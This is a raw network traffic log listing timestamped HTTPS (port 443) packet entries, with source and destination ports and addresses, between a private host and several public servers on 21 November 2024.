Nov 21, 2024 09:53:52.918884039 CET	443	49780	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.918942928 CET	49780	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.919102907 CET	49780	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.919114113 CET	443	49780	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.936399937 CET	443	49774	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.936470985 CET	443	49774	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.936613083 CET	49774	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.936659098 CET	49774	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.936678886 CET	443	49774	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.936692953 CET	49774	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.936700106 CET	443	49774	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.939120054 CET	49781	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.939142942 CET	443	49781	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.939265966 CET	49781	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.939465046 CET	49781	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.939477921 CET	443	49781	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:53.001454115 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.001477003 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.001529932 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.001562119 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.001586914 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.001602888 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.009855032 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.009871006 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.009919882 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.009943962 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.009958029 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.009984970 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.019000053 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.019026041 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.019084930 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.019155025 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.019193888 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.019217014 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.028223038 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.028249979 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.028297901 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.028316021 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.028345108 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.028378963 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.036221027 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.036246061 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.036292076 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.036305904 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.036333084 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.036353111 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.044833899 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.044856071 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.044904947 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.044924974 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.044951916 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.044970989 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.054027081 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.054043055 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.054114103 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.054169893 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.054332972 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.061940908 CET	443	49777	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:53.062104940 CET	443	49777	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:53.062201977 CET	49777	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:53.062227964 CET	49777	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:53.062246084 CET	443	49777	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:53.062268972 CET	49777	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:53.062274933 CET	443	49777	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:53.064734936 CET	49782	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:53.064768076 CET	443	49782	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:53.064825058 CET	49782	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:53.064961910 CET	49782	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:53.064973116 CET	443	49782	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:53.078023911 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.078049898 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.078104019 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.078147888 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.078176975 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.078432083 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.130150080 CET	443	49776	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:53.130229950 CET	443	49776	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:53.130321980 CET	49776	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:53.130484104 CET	49776	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:53.130534887 CET	443	49776	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:53.130569935 CET	49776	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:53.130587101 CET	443	49776	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:53.133299112 CET	49783	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:53.133347034 CET	443	49783	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:53.133414030 CET	49783	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:53.133641005 CET	49783	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:53.133652925 CET	443	49783	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:53.169457912 CET	49728	443	192.168.2.6	142.250.185.132
Nov 21, 2024 09:53:53.169526100 CET	443	49728	142.250.185.132	192.168.2.6
Nov 21, 2024 09:53:53.202805996 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.202826977 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.202903032 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.202997923 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.203064919 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.211024046 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.211049080 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.211096048 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.211119890 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.211133957 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.211157084 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.219950914 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.219974995 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.220091105 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.220109940 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.220168114 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.228957891 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.228985071 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.229055882 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.229079008 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.229123116 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.229150057 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.236759901 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.236783028 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.236848116 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.236864090 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.236893892 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.236913919 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.246277094 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.246298075 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.246349096 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.246387959 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.246412992 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.246433973 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.254182100 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.254196882 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.254252911 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.254268885 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.254472971 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.255261898 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.255321026 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.255326986 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.255342960 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.255374908 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.255383968 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:53.255392075 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:53.337181091 CET	443	49778	20.234.120.54	192.168.2.6
Nov 21, 2024 09:53:53.337318897 CET	49778	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:53.338146925 CET	49778	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:53.338155031 CET	443	49778	20.234.120.54	192.168.2.6
Nov 21, 2024 09:53:53.338373899 CET	49778	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:53.338377953 CET	443	49778	20.234.120.54	192.168.2.6
Nov 21, 2024 09:53:53.765078068 CET	443	49778	20.234.120.54	192.168.2.6
Nov 21, 2024 09:53:53.765149117 CET	443	49778	20.234.120.54	192.168.2.6
Nov 21, 2024 09:53:53.765162945 CET	49778	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:53.765187979 CET	49778	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:53.765218019 CET	49778	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:53.765234947 CET	443	49778	20.234.120.54	192.168.2.6
Nov 21, 2024 09:53:53.765245914 CET	49778	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:53.765655041 CET	49778	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:54.518732071 CET	443	49779	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:54.519217014 CET	49779	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:54.519253969 CET	443	49779	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:54.519862890 CET	49779	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:54.519891024 CET	443	49779	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:54.702048063 CET	443	49780	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:54.707792997 CET	49780	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:54.707839966 CET	443	49780	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:54.708631992 CET	49780	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:54.708636999 CET	443	49780	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:54.728705883 CET	443	49781	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:54.732747078 CET	49781	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:54.732774019 CET	443	49781	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:54.737163067 CET	49781	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:54.737168074 CET	443	49781	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:54.944817066 CET	443	49782	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:54.949281931 CET	443	49783	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:54.949501038 CET	49782	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:54.949585915 CET	443	49782	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:54.950114012 CET	49782	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:54.950128078 CET	443	49782	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:54.951838970 CET	49783	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:54.951874018 CET	443	49783	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:54.952238083 CET	49783	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:54.952246904 CET	443	49783	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:54.953418970 CET	443	49779	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:54.953608990 CET	443	49779	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:54.953672886 CET	49779	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:54.953862906 CET	49779	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:54.953862906 CET	49779	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:54.953881025 CET	443	49779	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:54.953890085 CET	443	49779	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:54.968154907 CET	49784	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:54.968215942 CET	443	49784	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:54.968275070 CET	49784	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:54.969058037 CET	49784	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:54.969074965 CET	443	49784	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:54.976331949 CET	49785	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:54.976370096 CET	443	49785	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:54.976444960 CET	49785	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:54.978570938 CET	49785	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:54.978585005 CET	443	49785	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:55.146811008 CET	443	49780	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.146878004 CET	443	49780	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.146956921 CET	49780	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.147954941 CET	49780	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.148005962 CET	443	49780	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.148035049 CET	49780	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.148056030 CET	443	49780	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.151624918 CET	49786	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.151674986 CET	443	49786	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.151727915 CET	49786	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.152153015 CET	49786	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.152168036 CET	443	49786	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.171901941 CET	443	49781	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.171971083 CET	443	49781	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.172010899 CET	49781	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.172194004 CET	49781	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.172213078 CET	443	49781	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.172224998 CET	49781	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.172230005 CET	443	49781	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.175297976 CET	49787	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.175403118 CET	443	49787	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.175482035 CET	49787	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.175659895 CET	49787	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.175685883 CET	443	49787	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.392638922 CET	443	49783	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.392714024 CET	443	49783	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.392781019 CET	49783	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.392940044 CET	49783	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.392963886 CET	443	49783	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.392977953 CET	49783	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.392983913 CET	443	49783	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.395587921 CET	49788	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.395653009 CET	443	49788	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.395709991 CET	49788	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.395881891 CET	49788	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.395896912 CET	443	49788	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.400042057 CET	443	49782	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.400125027 CET	443	49782	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.400187969 CET	49782	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.400290012 CET	49782	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.400335073 CET	443	49782	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.400367022 CET	49782	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.400382996 CET	443	49782	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.403129101 CET	49789	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.403172016 CET	443	49789	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:55.403228998 CET	49789	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.403489113 CET	49789	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:55.403506994 CET	443	49789	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:56.158812046 CET	49790	443	192.168.2.6	20.31.169.57
Nov 21, 2024 09:53:56.158852100 CET	443	49790	20.31.169.57	192.168.2.6
Nov 21, 2024 09:53:56.158987999 CET	49790	443	192.168.2.6	20.31.169.57
Nov 21, 2024 09:53:56.167129040 CET	49790	443	192.168.2.6	20.31.169.57
Nov 21, 2024 09:53:56.167144060 CET	443	49790	20.31.169.57	192.168.2.6
Nov 21, 2024 09:53:56.467411041 CET	49791	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:56.467472076 CET	443	49791	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:56.467576981 CET	49791	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:56.467936993 CET	49791	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:56.467948914 CET	443	49791	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:56.758239985 CET	443	49784	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:56.758867025 CET	49784	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:56.758903027 CET	443	49784	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:56.759423018 CET	49784	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:56.759428978 CET	443	49784	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:56.792706966 CET	443	49785	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:56.792850018 CET	49785	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:56.795039892 CET	49785	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:56.795054913 CET	443	49785	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:56.795968056 CET	443	49785	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:56.797312021 CET	49785	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:56.797394991 CET	49785	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:56.797401905 CET	443	49785	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:56.797552109 CET	49785	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:56.843332052 CET	443	49785	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:56.890268087 CET	443	49787	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:56.890729904 CET	49787	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:56.890773058 CET	443	49787	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:56.891146898 CET	49787	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:56.891160011 CET	443	49787	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:56.931910992 CET	443	49786	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:56.932315111 CET	49786	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:56.932358027 CET	443	49786	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:56.932852983 CET	49786	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:56.932857990 CET	443	49786	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.197310925 CET	443	49785	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:57.197597027 CET	443	49785	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:57.197658062 CET	49785	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:57.197841883 CET	49785	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:57.197869062 CET	443	49785	40.113.110.67	192.168.2.6
Nov 21, 2024 09:53:57.197992086 CET	49785	443	192.168.2.6	40.113.110.67
Nov 21, 2024 09:53:57.201677084 CET	443	49784	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.201747894 CET	443	49784	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.201814890 CET	49784	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.201950073 CET	49784	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.201972961 CET	443	49784	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.201984882 CET	49784	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.201991081 CET	443	49784	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.204499960 CET	49792	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.204524994 CET	443	49792	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.204591990 CET	49792	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.204724073 CET	49792	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.204735994 CET	443	49792	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.248677969 CET	443	49788	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.248909950 CET	443	49789	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.249099970 CET	49788	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.249124050 CET	443	49788	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.249336004 CET	49789	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.249355078 CET	443	49789	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.249706030 CET	49788	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.249711037 CET	443	49788	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.249830961 CET	49789	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.249835014 CET	443	49789	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.328104973 CET	443	49787	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.328171015 CET	443	49787	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.328232050 CET	49787	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.328402996 CET	49787	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.328438044 CET	443	49787	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.328459978 CET	49787	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.328470945 CET	443	49787	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.331098080 CET	49793	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.331135035 CET	443	49793	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.331376076 CET	49793	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.331515074 CET	49793	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.331528902 CET	443	49793	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.384438038 CET	443	49786	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.384530067 CET	443	49786	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.384677887 CET	49786	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.384713888 CET	49786	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.384736061 CET	443	49786	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.384743929 CET	49786	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.384748936 CET	443	49786	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.387316942 CET	49794	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.387339115 CET	443	49794	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.387393951 CET	49794	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.387518883 CET	49794	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.387532949 CET	443	49794	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.700865030 CET	443	49789	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.700921059 CET	443	49789	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.701225042 CET	49789	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.701603889 CET	443	49788	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.701670885 CET	443	49788	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.701721907 CET	49788	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.701800108 CET	49789	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.701821089 CET	443	49789	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.701832056 CET	49789	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.701838970 CET	443	49789	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.701970100 CET	49788	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.701983929 CET	443	49788	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.702001095 CET	49788	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.702008009 CET	443	49788	13.107.246.45	192.168.2.6
